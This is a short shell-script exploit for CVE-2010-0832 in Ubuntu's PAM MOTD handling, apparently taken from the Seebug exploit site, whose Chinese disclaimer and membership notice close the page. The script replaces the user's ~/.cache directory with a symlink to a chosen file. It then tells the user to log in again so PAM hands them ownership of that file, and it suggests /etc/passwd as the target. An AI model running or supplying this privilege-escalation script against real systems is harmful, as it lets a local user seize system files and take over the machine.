#!/bin/sh # # Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation) # Date: July 7, 2010 # Author: Kristian Erik Hermansen <kristian.hermansen@gmail.com> # Software Link: http://packages.ubuntu.com/ # Version: pam-1.1.0 # Tested on: Ubuntu 10.04 LTS (Lucid Lynx) # CVE : CVE-2010-0832 # # Notes: Affects Ubuntu 9.10 and 10.04 LTS # [Patch Instructions] # $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i # if [ $# -eq 0 ]; then echo "Usage: $0 /path/to/file" exit 1 fi mkdir $HOME/backup 2> /dev/null tmpdir=$(mktemp -d --tmpdir=$HOME/backup/) mv $HOME/.cache/ $tmpdir 2> /dev/null echo "\n@@@ File before tampering ...\n" ls -l $1 ln -sf $1 $HOME/.cache echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\n"
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论